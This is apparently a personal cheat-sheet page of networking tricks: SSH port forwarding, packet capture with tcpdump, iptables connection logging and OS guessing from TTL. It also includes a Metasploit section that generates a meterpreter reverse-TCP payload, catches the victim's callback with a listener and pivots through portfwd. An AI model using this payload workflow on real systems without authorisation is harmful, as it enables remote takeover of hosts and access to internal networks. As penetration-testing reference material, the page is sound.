Skip to content

Networks tricks

Port forwarding

The example.com machine has a web server running on port 8000 internally (not exposed to the internet). With the following command you can now access the web server from http://localhost:4444.

Using SSH

ssh -L 4444:127.0.0.1:8000 user@example.com

Using metasploit (meterpreter)

  • Generate the exploit with msfvenom.
$ msfvenom -p 'linux/x64/meterpreter_reverse_tcp' LHOST=10.132.0.2 LPORT=9001 -f elf > exploit.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1037272 bytes
Final size of elf file: 1037272 bytes

$ file exploit.bin
exploit.bin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, with debug_info, not stripped
  • Setup listener
$ msfconsole
...
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST ens4
LHOST => 10.132.0.2
msf6 exploit(multi/handler) > set LPORT 9001
LPORT => 9001
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.132.0.2:9001
[*] Meterpreter session 1 opened (10.132.0.2:9001 -> 10.154.0.2:45462 ) at 2021-10-19 19:27:31 +0000

meterpreter >
  • Do port forwarding
meterpreter > portfwd add -l 4444 -p 8000 -r 127.0.0.1
[*] Local TCP relay created: :4444 <-> 127.0.0.1:8000
meterpreter > portfwd list

Active Port Forwards
====================

   Index  Local           Remote        Direction
   -----  -----           ------        ---------
   1      127.0.0.1:8000  0.0.0.0:4444  Forward

1 total active port forwards.

meterpreter > portfwd delete -l 4444 -p 8000 -r 127.0.0.1
[*] Successfully stopped TCP relay on 0.0.0.0:4444

-l : Port on your local machine (attacker machine). -p : Port on the remote machine (victim machine). -r : Target host.

Using chisel

Ping

Use tcpdump to listen for ping request and reply.

$ sudo tcpdump icmp -n
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on wlp3s0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
18:53:25.737055 IP 192.168.117.150 > 192.168.117.58: ICMP echo request, id 1, seq 1, length 64
18:53:25.737224 IP 192.168.117.58 > 192.168.117.150: ICMP echo reply, id 1, seq 1, length 64

TCP connections

Add iptables rule that listen for new TCP connections.

$ sudo iptables -A INPUT -p tcp -m state --state NEW -j LOG --log-prefix "New TCP connection: " -i wlp3s0

Info

To remove the rule from iptables, execute the same commands but replace the -A with -D.

View the log :

$ journalctl -k --grep='New TCP connection: '
Sep 26 19:04:24 arch kernel: [NEW TCP connection] IN=wlp3s0 OUT= MAC=XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX:XX SRC=192.168.117.150 DST=192.168.117.58 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=25957
...

OS Information gathering

For Linux machines the ttl is often close to 64, however for Windows machines the ttl is close to 128.

$ ping localhost
PING localhost(localhost (::1)) 56 data bytes
64 bytes from localhost (::1): icmp_seq=1 ttl=64 time=0.058 ms
64 bytes from localhost (::1): icmp_seq=2 ttl=64 time=0.131 ms
64 bytes from localhost (::1): icmp_seq=3 ttl=64 time=0.078 ms
^C
--- localhost ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2019ms
rtt min/avg/max/mdev = 0.058/0.089/0.131/0.030 ms
Back to top